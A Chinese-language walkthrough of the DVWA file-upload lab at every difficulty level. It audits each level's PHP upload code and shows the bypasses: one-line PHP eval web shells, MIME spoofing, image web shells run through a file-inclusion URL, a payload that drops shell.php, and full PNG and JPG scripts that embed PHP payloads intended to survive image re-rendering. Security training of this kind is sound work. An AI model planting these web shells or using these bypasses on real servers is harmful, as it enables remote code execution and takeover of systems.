0x01 等级:Low
直接上源码
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// 向页面输出文件保存的路径
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
// 获取上传的文件名
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// 将上传的文件剪切到我们$target_path指定的路径
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// 上传失败说的话
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// 上传成功说的话
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>通过审计代码发现,并没有对上传的文件类型进行限制。也就是说,可以上传任意文件。
编辑cmd.php文件进行上传。文件内容为一句话木马
<?php @eval($_POST['cmd']);?> 
发现上传成功。文件上传之后页面显示了保存的路径
尝试访问我们的一句话木马
发现访问成功(因为cmd.php中并没有输出文字,所以页面为空白)
尝试使用中国蚁剑或者中国菜刀连接。发现连接成功。
0x02 等级:Medium
直接看源码
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// 上传成功地文件保存地路径
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
// 文件保存路径和文件名进行拼接 形成一个完整地路径+文件名
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// 获取完整地文件名
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
// 获取文件地MIME类型
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
// 获取文件地大小
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// 通过MIME判断文件是否为图片 程序员地理想是只允许上传jpg、png、gif、且文件小于1M才能上传成功
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// 将文件剪切到$target_path指定的路径
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// 剪切错误说的话
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// 剪切成功说的话
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// 上传了不允许的MIME说的话
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>通过审计代码发现,它只是对文件地MIME类型进行限制。
MIME即(多用途互联网邮件扩展类型)
MIME(Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式。.jpg的MIME为image/jpeg
.png的MIME为image/png
.gif的MIME为image/gif
.txt的MIME为text/plain
.php的MIME为text/php他们再HTTP协议中以Content-Type字段定义。
于是我们将.php文件地MIME修改为图片的MIME即可绕过。
使用burpsuite拦截数据包(不了解的可以自行百度)
修改前的MIME即Content-type:text/php
修改之后的MIME即Content-Type: image/jpeg
之后点击Forward放包即可
之后返回页面发现上传成功。并且在页面回显了保存路径。
尝试访问发现访问成功。
0x03 等级:Hight
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
// 获取文件地后缀名。比如上传的文件名为123.php那么获取的就为php
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// 对用户上传的文件名进行审核。如何后缀名不为jpg和jpeg以及png并且不大于1M并且获取图片的宽高大小以及属性如果不符合则则不会上传成功,反则上传成功。
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// 如果上传的文件不是图片的后缀则输出下面这句话
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>strrpos(string,find,start) 函数返回字符串 find 在另一字符串 string 中最后一次出现的位置,如果没有找到字符串则返回 false,可选参数 start 规定在何处开始搜索。getimagesize(string filename) 函数会通过读取文件头,返回图片的长、宽等信息,如果没有相关的图片文件头则报错。源码通过字符串匹配来确定文件后缀名,并且查看文件的相关参数,提高了过滤的强度。
很明显,这是一个基于白名单的限制(只允许上传某个后缀的文件)
只允许上传后缀为png或jpeg以及jpg的图片。并且大小不大于1M。以及必须符合getimagesize函数的特征。
一般绕过规则为MIME绕过、00截断(包含%00截断和0x00截断以及0x0a截断)、图片木马配合文件包含。
但是经过测试00截断均不行。
于是我们尝试使用图片木马进行上传。
我们先上传一个符合条件的图片。不大于1M
之后在其文件内容的后方添加一句话木马即<?php @eval($_POST[cmd]);?>
之后可以发现。上传成功。但是后缀是一个.png结尾的图片文件。而中国菜刀或中国蚁剑的原理是向上传文件发送包含参数的 post 请求,通过控制参数来执行不同的命令。这里服务器将木马文件解析成了图片文件,因此向其发送 post 请求时,服务器并不会执行相应命令。
于是我们这里想到了前面的文件包含。它的特性是如果被包含的文件内容中有符合php语法结构的语句。那么它会交给PHP程序执行。于是我们的.png结尾的一句话木马文件。通过文件包含可以执行相应的命令。
http://172.16.1.200/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/test.png
可以发现文件包成功包含。于是我们尝试使用中国蚁剑进行连接。
发现实际并不能通过文件包含的形式直接连接。
其实我们这里可以通过传参的方式。执行任意系统命令以及函数。
由于是POST请求的方式传参。我们可以使用HackBar插件
我们也可以w使用小马生大马的方式进行尝试
思路:上传一个经过我们处理后的png文件,文件的内容除了图片信息以外有我们附加的php代码。代码的功能就是,当我们通过文件包含访问这个png的时候。它会在某个目录下新建一个文件。而文件名为shell.php。内容则为一句话木马。
构造Payload:
<?php
$file = 'shell.php'; # 新建文件的文件名
$text = '<?php @eval$_POST[cmd]);?>'; # 文件地内容为一句话木马
file_put_contents($file,$text); # 新建这个文件
?>在文件内容的末尾增加我们的payload
上传成功之后。我们通过文件包含访问这个页面
http://172.16.1.200/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/payload.png
包含成功地同时也会生成一个shell.php的文件。
shell.php默认生成在当前文件包含页面的目录下。也就是http://172.16.1.200/dvwa/vulnerabilities/fi/目录下。我们可以通过http://172.16.1.200/dvwa/vulnerabilities/fi/shell.php访问。
发现访问成功。于是我们再次尝试使用中国蚁剑连接。发现连接成功。
0x04 等级: impossible
以下是对impossible级别源码的审计。
通过审计发现,源码使用imagecreatefromjpeg()和imagecreatefrompng()函数,这两个函数的作用就是,根据我们上传的图片。生成一个新的图片。如果我们上传的是图片马,那么会将我们的PHP代码部分删除。
我们尝试上传一个shell.png文件。其文件内容的最后一行有我们的PHP代码。
我们上传之后查看效果。
发现上传成功
将我们上传成功地图片,保存到本地,使用十六进制编辑器打开进行分析。
分析发现,我们的PHP代码被删除了。而这张图片就是由imagecreatefrompng()函数生成的。
这种操作我们一般称之为二次渲染,它会根据我们上传的图片,取图片里面的数据,生成一个新的图片。之后将我们的图片删除。
之后,我们的图片马就失效了,但不完全失效。。
0x04.2 上传png图片马
我们通过写入IDAT数据块,这里有国外大牛写的脚本,直接拿来运行即可。
这是是PHP脚本,可以直接使用php程序运行,或者放到服务器里面运行,运行之后得到1.png文件,上传即可。
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
0x66, 0x44, 0x50, 0x33);
$img = imagecreatetruecolor(32, 32);
for ($y = 0; $y < sizeof($p); $y += 3) {
$r = $p[$y];
$g = $p[$y+1];
$b = $p[$y+2];
$color = imagecolorallocate($img, $r, $g, $b);
imagesetpixel($img, round($y / 3), 0, $color);
}
imagepng($img,'./1.png');
?>上传成功之后,我们将其下载,丢到十六进制编辑器中打开
可以发现,经过二次渲染之后,还是可以隐写图片马的。
但是我这里尝试文件包含,发现语法报错
暂时没有利用成功,而且它代码使用$_GET传参0还有一个$_POST传参1,但是他们二者穿进去的是字符串类型的,字符串类型是不能作为语法解析的。除非使用eval()函数,这里暂时没有利用成功。
0x04.2 上传jpg图片马
<?php
$miniPayload = "<?=phpinfo();?>";
if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
die('php-gd is not installed');
}
if(!isset($argv[1])) {
die('php jpg_payload.php <jpg_name.jpg>');
}
set_error_handler("custom_error_handler");
for($pad = 0; $pad < 1024; $pad++) {
$nullbytePayloadSize = $pad;
$dis = new DataInputStream($argv[1]);
$outStream = file_get_contents($argv[1]);
$extraBytes = 0;
$correctImage = TRUE;
if($dis->readShort() != 0xFFD8) {
die('Incorrect SOI marker');
}
while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
$marker = $dis->readByte();
$size = $dis->readShort() - 2;
$dis->skip($size);
if($marker === 0xDA) {
$startPos = $dis->seek();
$outStreamTmp =
substr($outStream, 0, $startPos) .
$miniPayload .
str_repeat("\0",$nullbytePayloadSize) .
substr($outStream, $startPos);
checkImage('_'.$argv[1], $outStreamTmp, TRUE);
if($extraBytes !== 0) {
while((!$dis->eof())) {
if($dis->readByte() === 0xFF) {
if($dis->readByte !== 0x00) {
break;
}
}
}
$stopPos = $dis->seek() - 2;
$imageStreamSize = $stopPos - $startPos;
$outStream =
substr($outStream, 0, $startPos) .
$miniPayload .
substr(
str_repeat("\0",$nullbytePayloadSize).
substr($outStream, $startPos, $imageStreamSize),
0,
$nullbytePayloadSize+$imageStreamSize-$extraBytes) .
substr($outStream, $stopPos);
} elseif($correctImage) {
$outStream = $outStreamTmp;
} else {
break;
}
if(checkImage('payload_'.$argv[1], $outStream)) {
die('Success!');
} else {
break;
}
}
}
}
unlink('payload_'.$argv[1]);
die('Something\'s wrong');
function checkImage($filename, $data, $unlink = FALSE) {
global $correctImage;
file_put_contents($filename, $data);
$correctImage = TRUE;
imagecreatefromjpeg($filename);
if($unlink)
unlink($filename);
return $correctImage;
}
function custom_error_handler($errno, $errstr, $errfile, $errline) {
global $extraBytes, $correctImage;
$correctImage = FALSE;
if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
if(isset($m[1])) {
$extraBytes = (int)$m[1];
}
}
}
class DataInputStream {
private $binData;
private $order;
private $size;
public function __construct($filename, $order = false, $fromString = false) {
$this->binData = '';
$this->order = $order;
if(!$fromString) {
if(!file_exists($filename) || !is_file($filename))
die('File not exists ['.$filename.']');
$this->binData = file_get_contents($filename);
} else {
$this->binData = $filename;
}
$this->size = strlen($this->binData);
}
public function seek() {
return ($this->size - strlen($this->binData));
}
public function skip($skip) {
$this->binData = substr($this->binData, $skip);
}
public function readByte() {
if($this->eof()) {
die('End Of File');
}
$byte = substr($this->binData, 0, 1);
$this->binData = substr($this->binData, 1);
return ord($byte);
}
public function readShort() {
if(strlen($this->binData) < 2) {
die('End Of File');
}
$short = substr($this->binData, 0, 2);
$this->binData = substr($this->binData, 2);
if($this->order) {
$short = (ord($short[1]) << 8) + ord($short[0]);
} else {
$short = (ord($short[0]) << 8) + ord($short[1]);
}
return $short;
}
public function eof() {
return !$this->binData||(strlen($this->binData) === 0);
}
}
?>
食用方法:先准备一个jpg格式的图片,先上传的服务器,之后再保存的本地。
运行脚本
执行命令
php 123.php 123.jpg
其中123.php为脚本名称 123.jpg为图片名称
经过测试,上传之后,经过二次渲染,还是会把PHP代码内容去除掉。
大家可以去尝试以下。
本文作者为blog,转载请注明。
